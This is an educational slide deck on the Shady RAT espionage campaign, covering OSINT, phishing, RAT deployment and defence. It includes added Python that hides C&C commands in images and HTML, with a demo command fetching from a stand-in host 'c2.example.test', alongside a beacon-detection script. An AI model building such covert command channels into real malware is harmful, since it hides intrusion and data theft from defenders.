ShadyRAT: Anatomy of targeted attack
Vladislav Radetskiy
About me…
Started in 2007 at the Help Desk, then as a System Administrator.
4 years of experience in IT outsourcing.
Since 2011 working at BAKOTECH® Group.
Information security was previously my hobby; now it's my job.
I am responsible for technical support of McAfee solutions.
https://radetskiy.wordpress.com/
http://www.slideshare.net/Glok17/
http://ua.linkedin.com/pub/vladislav-radetskiy/47/405/809
Vladislav Radetskiy
Technical Lead
C|EH applicant
Agenda
Terminology: today's cybersecurity battleground
ShadyRAT: a successful long-term, complex cybercrime operation
How can we protect our clients from such advanced attacks?
Basics #1
Open-source intelligence (OSINT) – gathering information from public sources.
Usual OSINT sources are Google, Facebook, LinkedIn, etc.
Social engineering – the act of deceiving and manipulating people for gain: money, information disclosure, access to a restricted area, etc.
Famous examples: Frank William Abagnale (Catch Me If You Can), Kevin Mitnick.
OSINT during the Cold War
“The decryption of a picture” from the CIA library
3 months of analysis by Charles V. Reeves from Boston Edison
OSINT nowadays
Getting information about someone is not rocket science.
A couple of hours, or even less with tools.
Name, DOB, job, family status, habits, likes & dislikes, complexes.
Basics #2
Cyber-attack – a sequence of steps to compromise an IT system
Advanced Persistent Threat (APT) – a targeted, covert, long-term attack
Vulnerability – a defect (a bug) in software (e.g. Microsoft, Adobe, Java products)
Exploit – a tool that takes advantage of a vulnerability (exploit-db.com)
Basics #3
Remote Access Tool (RAT) – a tool for remote control of a hacked system
Trojan / backdoor / Meterpreter, etc.
Command and Control (C&C) – servers on the Internet that attackers use to control compromised systems and interact with persistent malware
Steganography – a method of hiding data/code inside files (e.g. images)
Briefing on the modern battleground
Cyber-criminals:
attack for information or money
can use ready-made tools (regardless of their technical skills)
can choose anyone as their target
use OSINT and social engineering (to craft the perfect lure)
ShadyRAT
In 2011 McAfee Labs gained access to one C&C server. From the server logs:
Duration of operation: 5+ years
Number of victims: 70+
Average duration of persistence: ~9 months
Outcome: stolen data
Scope of targets: government, private and non-profit organizations…
ShadyRAT
Hi, Bob. Remember me? It's me, John. We were together at the last Yankees game. Listen, I can give you a great discount on ___________ . Thanks in advance
ShadyRAT
Bob trustingly opened the attached file, which exploited a vulnerability to install a RAT on Bob's system.
ShadyRAT
The RAT communicates with the C&C server to get instructions.
ShadyRAT
The attacker sends commands: Sleep / Download / Upload …
ShadyRAT
The RAT transfers private data from Bob's system to the C&C server.
The channel between the RAT and the C&C was concealed by steganography (not encrypted: the commands were hidden inside ordinary-looking files). It's like a smokescreen for security staff.
ShadyRAT
It's payday for the attacker: collecting the stolen data, which can be sold for real money.
ShadyRAT
This can be repeated again and again for 3–9 months, and Bob didn't notice anything. Meanwhile his company goes down...
ShadyRAT
1. Attackers choose the victim company
2. Gather information about its employees via OSINT
3. Use social engineering to compose fake emails with attached files
4. Victims receive the fake email and... open the attached file (.xls)
5. The exploit in the attached file deploys the RAT
6. The RAT establishes outbound connections to the C&C and transfers data
7. Commands to the RAT are hidden by steganography (HTML, images)
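Steps 6 and 7 above, together with the steganography definition in Basics #3, describe the covert channel: the implant fetches an innocuous-looking image or HTML page and the operator's command is hidden inside it, so the traffic looks like ordinary web browsing. The following Python is an added illustration of both carriers (least-significant-bit steganography in raw pixel bytes, and a base64 blob inside an HTML comment) with a defender-side extractor; it is not code from the presentation or from the real malware. The `CMD:` marker, the verb list, the gradient cover image and the HTML page are all constructed for the example.

```python
"""Shady RAT-style covert command channel (added illustration, not the talk's
or the malware's code): commands hidden in the LSB plane of an image and in
an HTML comment, plus a defender-side scanner.  MAGIC, KNOWN_VERBS, the cover
image and the HTML page are constructed assumptions."""
import base64
import binascii
import re
from typing import List, Optional

MAGIC = b"CMD:"                                  # hypothetical payload marker
KNOWN_VERBS = ("sleep", "download", "upload")    # the verbs named on the slides


def make_cover_image(width: int, height: int) -> bytearray:
    """Constructed 8-bit grayscale 'image': a smooth gradient, no file header."""
    return bytearray(((3 * x + 5 * y) & 0xFF) for y in range(height) for x in range(width))


def _bits(data: bytes):
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def lsb_embed(cover: bytes, command: bytes) -> bytearray:
    """Write MAGIC + 2-byte length + command into the least significant bit of
    successive pixel bytes; every pixel changes by at most 1, invisible to the eye."""
    payload = MAGIC + len(command).to_bytes(2, "big") + command
    if len(payload) * 8 > len(cover):
        raise ValueError("cover image too small for payload")
    stego = bytearray(cover)
    for i, bit in enumerate(_bits(payload)):
        stego[i] = (stego[i] & 0xFE) | bit
    return stego


def _lsb_bytes(image: bytes, count: int) -> bytes:
    out = bytearray()
    for i in range(count):
        value = 0
        for j in range(8):
            value = (value << 1) | (image[8 * i + j] & 1)
        out.append(value)
    return bytes(out)


def lsb_decode(image: bytes) -> Optional[bytes]:
    """Recover the command, or None if the LSB plane carries no MAGIC header."""
    header_len = len(MAGIC) + 2
    if len(image) < header_len * 8:
        return None
    header = _lsb_bytes(image, header_len)
    if not header.startswith(MAGIC):
        return None
    length = int.from_bytes(header[len(MAGIC):], "big")
    if len(image) < (header_len + length) * 8:
        return None
    return _lsb_bytes(image, header_len + length)[header_len:]


_B64_COMMENT = re.compile(r"<!--\s*([A-Za-z0-9+/]+={0,2})\s*-->")


def html_embed(page: str, command: bytes) -> str:
    """Hide a command as a base64 blob in an HTML comment just before </body>."""
    blob = base64.b64encode(command).decode("ascii")
    return page.replace("</body>", f"<!-- {blob} -->\n</body>", 1)


def html_decode(page: str) -> List[bytes]:
    """Return the decoded body of every comment that is valid base64."""
    found = []
    for match in _B64_COMMENT.finditer(page):
        try:
            found.append(base64.b64decode(match.group(1), validate=True))
        except binascii.Error:
            continue
    return found


def looks_like_command(data: bytes) -> bool:
    """Printable ASCII whose first word is one of the operator verbs."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return False
    return text.isprintable() and text.split(" ", 1)[0].lower() in KNOWN_VERBS


def scan_fetched_file(body: bytes, content_type: str) -> List[bytes]:
    """Defender side: extract candidate payloads from a fetched file and keep
    those that read as a command.  Knowing MAGIC and the verbs is the assumption
    here; a real scanner knows neither, which is why this channel is hard to spot."""
    if content_type.startswith("text/html"):
        candidates = html_decode(body.decode("utf-8", "replace"))
    else:
        found = lsb_decode(body)
        candidates = [found] if found is not None else []
    return [c for c in candidates if looks_like_command(c)]


if __name__ == "__main__":
    stego = lsb_embed(make_cover_image(64, 64), b"download http://c2.example.test/update.bin")
    print("image carries:", scan_fetched_file(bytes(stego), "image/x-raw"))
    page = html_embed("<html><body><p>Welcome</p></body></html>", b"sleep 3600")
    print("page carries:", scan_fetched_file(page.encode(), "text/html"))
```

The point for defenders is in the last function: decoding only works because the scanner was told the marker and the command grammar. Without that knowledge an LSB payload is statistically almost indistinguishable from image noise, so in practice the channel is caught through the implant's behaviour (regular outbound fetches of the same small files) rather than by inspecting the files themselves.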
ShadyRAT
What's the matter?!
Attackers used software vulnerabilities together with social engineering
Attackers were able to search for and collect data for months
The operation was not technically complex; rather simple
The RAT went undetected for months (9–28)
Outcome: a large amount of data that can be sold for money or used later for blackmail
Any lessons learned after ShadyRAT? No!
July 2014 – January 2015: meet CTB-Locker (Critroni)
Crypto-ransomware: $350–700 demanded to decrypt the data
Spreads by random, not targeted, spam
How can we protect against APT?
Components
How can we protect against APT?
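The slides pose the question without a recipe; one practical detection that follows directly from steps 6 and 7 of the attack (the RAT polls its C&C over outbound HTTP, for months, fetching innocuous files) is beaconing analysis over proxy logs: a timer-driven implant produces request intervals that are far more regular than a human's browsing. The following Python is an added example, not the author's or McAfee's code. The log format, the client addresses, the hostnames and every log line are constructed (TEST-NET style addresses and .test names).

```python
"""Beaconing detection over proxy logs (added illustration, not from the talk).
The log format below and all sample lines are constructed."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from typing import Dict, List, Tuple

# Constructed proxy log: "<timestamp> <client> <host> <method> <path> <status> <bytes>"
# 10.0.0.5 polls cdn-images.example.test every ~600 s (the implant) while also
# browsing www.example.org irregularly (the human); 10.0.0.9 is background noise.
SAMPLE_LOG = """\
2015-03-02T09:00:00 10.0.0.5 cdn-images.example.test GET /img/banner.gif 200 4096
2015-03-02T09:00:10 10.0.0.5 www.example.org GET / 200 15230
2015-03-02T09:00:12 10.0.0.5 www.example.org GET /news 200 40211
2015-03-02T09:02:00 10.0.0.9 intranet.example.test GET /portal 200 8800
2015-03-02T09:07:40 10.0.0.5 www.example.org GET /news/item1 200 30002
2015-03-02T09:10:00 10.0.0.5 cdn-images.example.test GET /img/banner.gif 200 4096
2015-03-02T09:20:01 10.0.0.5 cdn-images.example.test GET /img/banner.gif 200 4096
2015-03-02T09:30:00 10.0.0.5 cdn-images.example.test GET /img/banner.gif 200 4096
2015-03-02T09:40:00 10.0.0.5 cdn-images.example.test GET /img/banner.gif 200 4096
2015-03-02T09:45:03 10.0.0.5 www.example.org GET /weather 200 12000
2015-03-02T09:50:02 10.0.0.5 cdn-images.example.test GET /img/banner.gif 200 4096
2015-03-02T10:00:00 10.0.0.5 cdn-images.example.test GET /img/banner.gif 200 4096
2015-03-02T10:10:00 10.0.0.5 cdn-images.example.test GET /img/banner.gif 200 4096
2015-03-02T10:20:00 10.0.0.5 www.example.org GET /sport 200 22000
2015-03-02T10:21:15 10.0.0.5 www.example.org GET /sport/live 200 18500
2015-03-02T10:30:00 10.0.0.9 intranet.example.test GET /portal 200 8800
2015-03-02T11:59:59 10.0.0.5 www.example.org GET /news 200 40300
2015-03-02T12:15:00 10.0.0.9 intranet.example.test GET /portal 200 8800
"""


def parse_line(line: str) -> Tuple[datetime, str, str, int]:
    ts, client, host, _method, _path, _status, size = line.split()
    return datetime.fromisoformat(ts), client, host, int(size)


def detect_beacons(lines, min_events: int = 6, max_cv: float = 0.15) -> List[dict]:
    """Flag (client, host) pairs whose inter-request intervals are nearly constant.
    cv = stdev / mean of the gaps: human browsing gives a large cv, a timer a tiny one.
    Pairs with fewer than min_events requests are skipped as too few to judge."""
    hits: Dict[Tuple[str, str], List[Tuple[datetime, int]]] = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        ts, client, host, size = parse_line(line)
        hits[(client, host)].append((ts, size))

    alerts = []
    for (client, host), events in hits.items():
        if len(events) < min_events:
            continue
        events.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            alerts.append({
                "client": client,
                "host": host,
                "events": len(events),
                "mean_interval_s": avg,
                "cv": cv,
                # identical response sizes every time is a second hint of a canned reply
                "uniform_size": len({s for _, s in events}) == 1,
            })
    return sorted(alerts, key=lambda a: a["cv"])


if __name__ == "__main__":
    for alert in detect_beacons(SAMPLE_LOG.splitlines()):
        print(f"{alert['client']} -> {alert['host']}: {alert['events']} requests, "
              f"every {alert['mean_interval_s']:.0f}s (cv={alert['cv']:.3f}, "
              f"uniform size={alert['uniform_size']})")
```

The thresholds are illustrative. Two caveats a practitioner would add: legitimate software also beacons (update checkers, mail clients, monitoring agents), so the output needs an allow-list of known hosts; and an attacker who adds random jitter to the sleep interval raises the cv, which is why the size-uniformity and the fetched content (small, identical images from a host nobody browses to) are worth scoring alongside the timing.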
Conclusions
Cybercrime today is a way to make money: a business
Almost anyone can pick up the tools and try to break in (Kali Linux, msf, etc.)
At the same time anyone can be chosen as a target
Be aware of targeted attacks, OSINT and social engineering
Sources
• Dmitri Alperovitch, Vice President of Threat Research, McAfee:
“Revealed: Operation Shady RAT” (August 2011)
• Bruce Schneier, computer security and privacy specialist:
“The State of Incident Response” (Black Hat USA 2014)
• Steven Rambam, private investigator who uses OSINT, Pallorium, Inc.:
“Privacy is Dead - Get Over It” (2010)
“Privacy: A Postmortem” (2012)
“…Taking Anonymity” (2014)
Example of human vulnerabilities
2012 - Photos of Prince William Expose Royal Air Force Passwords
Example of human vulnerabilities
2014 - FIFA World Cup Brazilian Security Command Center Wi-Fi Pass
b5a2112014
Example of human vulnerabilities
2015 – French TV5Monde: passwords exposed on camera during a TV interview given while the station was reporting on the hack it had just suffered
And please don’t forget …
Sometimes (usually, in fact) Google, Facebook, Twitter and LinkedIn are the primary sources of private information about whole companies and their employees.
Information about the predilections, habits and complexes of chosen people can be recovered by OSINT and used by an attacker as a pretext for social engineering.
Thank you for your attention
Vladislav Radetskiy
radetskiy.wordpress.com